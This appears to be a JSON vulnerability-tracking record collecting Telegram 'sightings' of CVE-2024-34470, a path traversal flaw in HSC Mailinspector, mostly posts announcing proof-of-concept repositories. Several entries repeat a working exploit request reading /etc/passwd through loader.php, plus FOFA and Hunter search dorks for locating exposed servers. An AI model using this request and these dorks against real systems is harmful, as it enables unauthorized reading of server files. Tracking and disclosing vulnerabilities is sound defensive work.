{"vulnerability": "CVE-2024-34470", "sightings": [{"uuid": "cf1d4706-a0fb-4125-87c5-e4977c41c1d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7710", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC and bulk scanner for CVE-2024-34470\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-34470\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-19T11:36:16.000000Z"}, {"uuid": "ebece8c6-043f-435c-a47c-f30e724d9782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7746", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34470 : An Unauthenticated Path Traversal Vulnerability in HSC Mailinspector\nURL\uff1ahttps://github.com/th3gokul/CVE-2024-34470\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-23T03:22:40.000000Z"}, {"uuid": "57473150-9ec6-4055-91ec-c9269e871106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "seen", "source": "https://t.me/TheDarkWebInformer/17205", "content": "CVE-2024-34470: Path Traversal vulnerability in HSC Mailinspector\n\nCredit: youtube.com/@brutsecurity/", "creation_timestamp": "2025-05-13T19:03:06.000000Z"}, {"uuid": "32eb2242-a499-44a8-9f2a-af604f32cb20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "Telegram/Rc4aowQ97LYVVQDGxjBnVNF9nlBdJPyzpxpsubjMvnRZHA", "content": "", "creation_timestamp": "2024-06-12T15:51:16.000000Z"}, {"uuid": "cdd93784-fcf4-4f16-b464-f2526452c585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "Telegram/yPYr0DasaZkkHrbr-hd2EaUFfatAxAgNbVitVrHRDWk2cg", "content": "", "creation_timestamp": "2024-06-19T16:43:11.000000Z"}, {"uuid": "05a11c0c-44c7-4f0e-a982-1b2eeb1c4d9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1196", "content": "https://github.com/Mr-r00t11/CVE-2024-34470", "creation_timestamp": "2024-06-20T23:43:07.000000Z"}, {"uuid": "5b419d66-2075-4fe6-b84e-d77067b58459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1194", "content": "\ud83d\udea8POC RELEASED\ud83d\udea8CVE-2024-34470 \"A critical vulnerability has been found in HSC Mailinspector up to version 5.2.18. This vulnerability affects an unknown functionality of the file /public/loader.php. Manipulating the 'path' argument with an unknown input leads to a path traversal vulnerability. According to CWE, this issue is classified as CWE-22.\n\nThe product uses external input to construct a pathname intended to identify a file or directory located beneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location outside of the restricted directory. This affects confidentiality, integrity, and availability.\"\n\nhttps://x.com/DarkWebInformer/status/1803905811229352212", "creation_timestamp": "2024-06-20T23:41:59.000000Z"}, {"uuid": "8442cfb4-aa91-421f-aaf7-6b5a6cfce133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/darkcommunityofficial/1030", "content": "CVE-2024-34470 HSC MailInspector\n*\nPOC:\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\nFOFA:\ntitle==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2024-06-20T01:17:39.000000Z"}, {"uuid": "c988c176-d015-4ace-bede-767eeba9c217", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/CipherAgents/1306877", "content": "CVE-2024-34470 HSC MailInspector\n\nPOC:\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\nFOFA:\ntitle==\"..:: HSC MailInspector ::..\"\n\n#\ud835\ude4f\ud835\ude40\ud835\ude3c\ud835\ude48_\ud835\ude41\ud835\ude4e\ud835\ude40\ud835\ude3e #\ud835\ude4f\ud835\ude40\ud835\ude3c\ud835\ude48_\ud835\ude44\ud835\ude49\ud835\ude3f", "creation_timestamp": "2024-07-05T07:47:22.000000Z"}, {"uuid": "7c873d24-14f4-4cd6-b05a-222abf4e74a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2125", "content": "CVE-2024-34470 HSC MailInspector\n*\nPOC:\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\nFOFA:\ntitle==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2024-06-19T09:56:32.000000Z"}, {"uuid": "7a4ef464-d217-4d5a-bbe7-cf9ccf302461", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "Telegram/QibJsYL0eBhpoxhmaVTLg5u9toELdHUjfLp1DtbVaDJ7_HE", "content": "", "creation_timestamp": "2024-07-05T07:14:04.000000Z"}, {"uuid": "774d5be6-129d-4804-ba74-91adb8edbf0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2655", "content": "CVE-2024-34470\n\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\n#poc  #exploit", "creation_timestamp": "2024-06-12T15:56:04.000000Z"}, {"uuid": "c96d724a-1fe9-49ea-b1b0-4e33bc6d539d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2685", "content": "CVE-2024-34470\n\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-06-19T15:42:16.000000Z"}, {"uuid": "4f56a50c-8df5-4d53-8a56-a7220699fbbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "seen", "source": "https://t.me/brutsecurity/560", "content": "\u2604\ufe0fCVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector! \n \n\ud83d\udce3An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. \n \n\ud83d\udeabPoC: https://lnkd.in/gK4NHJ4C\n\u26d4\ufe0fVideo POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share\n \n\ud83c\udf10Dorks: \nHunter: web.title==\"..:: HSC MailInspector ::..\" \nFOFA: title==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2026-07-09T03:00:13.452125Z"}, {"uuid": "d3267386-5cbf-4be9-9c52-c9c27ec81162", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "seen", "source": "https://t.me/brutsecurity/560", "content": "\u2604\ufe0fCVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector! \n \n\ud83d\udce3An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. \n \n\ud83d\udeabPoC: https://lnkd.in/gK4NHJ4C\n\u26d4\ufe0fVideo POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share\n \n\ud83c\udf10Dorks: \nHunter: web.title==\"..:: HSC MailInspector ::..\" \nFOFA: title==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2026-07-10T00:00:37.317514Z"}, {"uuid": "bae01b87-34ec-4de9-b539-de1b9e65965f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/560", "content": "\u2604\ufe0fCVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector! \n \n\ud83d\udce3An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. \n \n\ud83d\udeabPoC: https://lnkd.in/gK4NHJ4C\n\u26d4\ufe0fVideo POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share\n \n\ud83c\udf10Dorks: \nHunter: web.title==\"..:: HSC MailInspector ::..\" \nFOFA: title==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2026-07-11T18:00:04.454448Z"}, {"uuid": "df1f71c7-ae2f-4825-a382-e630deef9603", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/560", "content": "\u2604\ufe0fCVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector! \n \n\ud83d\udce3An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. \n \n\ud83d\udeabPoC: https://lnkd.in/gK4NHJ4C\n\u26d4\ufe0fVideo POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share\n \n\ud83c\udf10Dorks: \nHunter: web.title==\"..:: HSC MailInspector ::..\" \nFOFA: title==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2026-07-12T00:00:41.741542Z"}]}